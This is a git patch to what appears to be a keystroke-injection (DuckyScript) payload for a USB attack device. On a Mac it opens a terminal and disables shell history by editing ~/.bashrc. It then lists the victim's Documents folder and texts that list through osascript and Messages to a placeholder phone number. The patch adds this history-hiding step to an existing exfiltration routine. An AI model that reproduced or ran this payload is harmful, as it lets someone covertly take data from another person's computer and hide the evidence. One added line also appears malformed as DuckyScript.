From 32c6ca17dd289a68cd9d71b139fcb3a97030d3b9 Mon Sep 17 00:00:00 2001 From: Narsty Date: Thu, 22 Jun 2023 22:23:32 -0500 Subject: [PATCH] Update Documents file list to iPhone.txt --- RECON/Documents file list to iPhone.txt | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/RECON/Documents file list to iPhone.txt b/RECON/Documents file list to iPhone.txt index 5d8525c..752070a 100644 --- a/RECON/Documents file list to iPhone.txt +++ b/RECON/Documents file list to iPhone.txt @@ -20,13 +20,18 @@ STRING terminal DELAY 1000 ENTER DELAY 500 -STRING x=$(ls /Users/SYSTEM USERNAME HERE/Documents); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +STRING x=$(ls /Users/SYSTEM USERNAME HERE/Documents); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' DELAY 500 ENTER DELAY 500 ENTER DELAY 2000 -GUI h +GUI W